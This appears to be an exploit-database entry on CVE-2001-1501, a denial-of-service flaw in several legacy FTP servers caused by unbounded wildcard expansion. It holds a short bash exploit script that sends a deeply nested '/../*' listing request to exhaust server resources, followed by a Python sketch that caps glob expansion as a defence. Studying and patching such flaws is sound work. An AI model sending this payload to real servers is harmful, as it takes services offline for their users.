WU-FTPD 2.4/2.5/2.6 / Trolltech ftpd 1.2 / ProFTPd 1.2 / BeroFTPD 1.3.4 FTP - glob Expansion
Author: Frank DENIS
type: remote
platform: linux
port:
date_added: 2001-03-15
date_updated: 2012-08-20
verified: 1
codes: CVE-2001-1501;OSVDB-526
tags:
aliases:
screenshot_url:
application_url:
source: https://www.securityfocus.com/bid/2496/info
Many FTP servers are vulnerable to a denial of service condition caused by poor globbing algorithms and inadequate per-user resource usage limits.
Globbing generates pathnames from the file name patterns used by the shell, e.g. wildcards denoted by * and ?, multiple choices denoted by {}, etc.
The vulnerable FTP servers can be exploited to exhaust system resources if per-user resource usage controls have not been implemented.
#!/bin/bash
ftp -n FTP-SERVER<<\end
quot user anonymous
bin
quot pass shitold@bug.com
ls /../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*
bye
end
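
A defensive sketch of the two controls the advisory points to: a cost check on the pattern before expansion and a hard limit on the work one request may cause. This is an added example, not code from any of the affected servers; the function names, thresholds and the three-directory sample tree are assumptions constructed for illustration, and the expander is a simplified model that handles only fnmatch-style wildcards.

```python
import fnmatch
import os
import tempfile

class GlobBudgetExceeded(Exception):
    """Raised instead of letting an expansion consume unbounded CPU/memory."""

def wildcard_components(pattern):
    # Path components containing glob metacharacters; each one multiplies the work.
    return sum(1 for part in pattern.split("/") if any(m in part for m in "*?[{"))

def bounded_glob(root, pattern, max_wild=4, max_visits=1000):
    # Cheap pre-check first, then a hard cap on directory entries examined.
    if wildcard_components(pattern) > max_wild:
        raise GlobBudgetExceeded("too many wildcard components")
    visits, current = 0, [root]
    for part in (p for p in pattern.split("/") if p):
        matched = []
        for base in current:
            if not os.path.isdir(base):
                continue
            if part == "..":
                # Like "/.." in a chrooted FTP root: never climb above root.
                matched.append(root if base == root else os.path.dirname(base))
                continue
            for name in os.listdir(base):
                visits += 1
                if visits > max_visits:
                    raise GlobBudgetExceeded("visit budget exhausted")
                if fnmatch.fnmatchcase(name, part):
                    matched.append(os.path.join(base, name))
        current = matched
    return current

def demo(pattern, max_visits=1000):
    # Constructed sample tree: three empty directories under a temporary root.
    with tempfile.TemporaryDirectory() as root:
        for name in ("pub", "incoming", "etc"):
            os.mkdir(os.path.join(root, name))
        try:
            return len(bounded_glob(root, pattern, max_visits=max_visits))
        except GlobBudgetExceeded as exc:
            return str(exc)

if __name__ == "__main__":
    for repeats in (1, 2, 4, 13):
        print(repeats, demo("/../*" * repeats, max_visits=50))
```

With three directories in the root, each additional `/../*` pair triples the number of paths produced, which is why the limit has to be enforced during expansion and not only on the final result.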